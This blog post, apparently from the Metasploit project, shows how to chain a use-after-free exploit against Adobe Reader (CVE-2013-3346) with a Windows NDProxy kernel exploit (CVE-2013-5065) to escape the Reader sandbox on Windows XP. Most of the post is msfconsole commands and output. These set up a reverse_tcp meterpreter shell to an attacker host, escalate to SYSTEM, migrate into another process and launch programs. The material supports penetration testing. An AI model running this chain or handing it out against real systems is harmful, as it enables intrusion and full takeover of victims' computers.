Last updated at Sat, 19 Aug 2017 18:30:07 GMT
Recently, FireEye identified and shared information about two vulnerabilities used in the wild to exploit Adobe Reader on Windows XP SP3 systems. The vulnerabilities are:
- CVE-2013-3346: An Use After Free on Adobe Reader. Specifically in the handling of a ToolButton object, which can be exploited through document's Javascript. This vulnerability is used to get remote code execution through a malicious PDF document. The code will be executed in a renderer process, inside the Adobe Reader sandbox if available.
- CVE-2013-5065: A out of bounds array access on the Windows kernel driver ndproxy.sys. This vulnerability allows to escape the Adobe Reader sandbox so execution of processes and persistence can be easily achieved. As has been already disclosed, remember which the Routing and Remote Access service must be enabled in the target so the NDProxy driver will be available.
Metasploit already has modules available for both vulnerabilities:
- CVE-2013-3346 is covered by two modules, the file format and the browser version of the exploit. At the time of writing the browser version targets Internet Explorer and Adobe Reader 9 and 10.
- CVE-2013-5065 is covered by a local windows exploit.
In this blog post we're going to explain how to chain both modules to accomplish Adobe Reader Sandbox bypass like in the wild.
- First of all, a session from a Reader renderer process is needed. In order to get it, the file format or the browser version of the
adobe_toolbutton
exploit can be used. In this example, the browser version is used:
msf > use exploit/windows/browser/adobe_toolbutton
msf exploit(adobe_toolbutton) > set SRVHOST 192.168.172.1
SRVHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_toolbutton) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(adobe_toolbutton) > exploit
[ ] Exploit running as background job.
[ ] Started reverse handler on 192.168.172.1:4444
[ ] Using URL: http://192.168.172.1:8080/vMrwTnexHFjnis
[ ] Server started.
msf exploit(adobe_toolbutton) > [*] 192.168.172.244 adobe_toolbutton - Gathering target information.
[ ] 192.168.172.244 adobe_toolbutton - request: /vMrwTnexHFjnis/SZLfWc/
[ ] 192.168.172.244 adobe_toolbutton - Sending PDF...
[ ] Sending stage (769024 bytes) to 192.168.172.244
[ ] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1039) at 2013-12-17 16:10:55 -0600
msf exploit(adobe_toolbutton) > sessions -i 1
[ ] Starting interaction with 1...
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer : JUAN-C0DE875735
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >
- With this session shouldn't be possible to execute a new process, neither migrate to an existent process, because the Reader sandbox will prevent:
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
3304 3128 AcroRd32.exe 4294967295
3336 3304 AcroRd32.exe x86 0 JUAN-C0DE875735\Administrator C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3824 1452 cmd.exe 4294967295
meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
- Here is where the ms_ndproxy local exploit comes to the rescue. Use it with the current session. Remember which the target process, at the moment, is inside the sandbox, so the exploit will elevate the current one (you can not execute a new process).
meterpreter > background
[*] Backgrounding session 1...
msf exploit(adobe_toolbutton) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > set SESSION 1
SESSION => 1
msf exploit(ms_ndproxy) > exploit
[*] Started reverse handler on 10.6.0.165:4444
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
- So even when there isn't new session in this case, the original should belong to SYSTEM if the exploit has been successful:
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
- Even when we're still inside a sandboxed process, now we should available to migrate, and finally execute new processes:
meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps -S AcroRd32|cmd
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
3304 3128 AcroRd32.exe x86 0 JUAN-C0DE875735\Administrator C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3336 3304 AcroRd32.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
3824 1452 cmd.exe x86 0 JUAN-C0DE875735\Administrator C:\WINDOWS\system32\cmd.exe
meterpreter > migrate 3824
[*] Migrating from 3336 to 3824...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2372 created.
meterpreter > ps -S calc
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2372 3824 calc.exe x86 0 JUAN-C0DE875735\Administrator c:\windows\system32\calc.exe
meterpreter >
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments